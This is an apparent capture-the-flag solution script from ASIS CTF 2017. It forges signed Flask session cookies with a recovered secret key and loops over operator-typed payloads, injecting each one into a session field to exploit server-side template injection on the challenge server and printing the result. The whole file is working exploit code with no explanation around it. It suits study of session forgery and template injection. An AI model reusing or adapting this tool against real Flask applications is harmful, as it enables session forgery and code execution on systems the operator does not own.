A script to generate flask sessions and exploit a server side template injection - ASIS CTF 2017

flask-custom-sessions.py

import requests
from itsdangerous import base64_decode
from flask.sessions import SecureCookieSessionInterface
import HTMLParser

obtained_secret = "7h15_5h0uld_b3_r34lly_53cur3d"

class FlaskMockApp(object):
    def __init__(self, secret_key):
        self.secret_key = secret_key

def session_cookie_encoder(secret_key, session_cookie_structure):
    try:
        app = FlaskMockApp(secret_key)
        si = SecureCookieSessionInterface()
        s = si.get_signing_serializer(app)

        return s.dumps(session_cookie_structure)
    except Exception as e:
        return "[Encoding error]{}".format(e)

cookie_string_template = "_ga=GA1.2.23644687.1504890772; _gid=GA1.2.842114127.1504890772; session={0}"

while True:
	payload = raw_input("Enter payload> ")
	signed_cookie = session_cookie_encoder(obtained_secret, {"golem": payload})
	cookie_header = cookie_string_template.format(signed_cookie)
	custom_headers = {
		"Cookie": cookie_header,
		"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0"
	}
	response = requests.post("https://golem.asisctf.com/golem", data={"golem":"Hello"}, headers=custom_headers)
	required_output = response.text.split("Hello :")[1].split(", why you don't")[0]
	print HTMLParser.HTMLParser().unescape(required_output)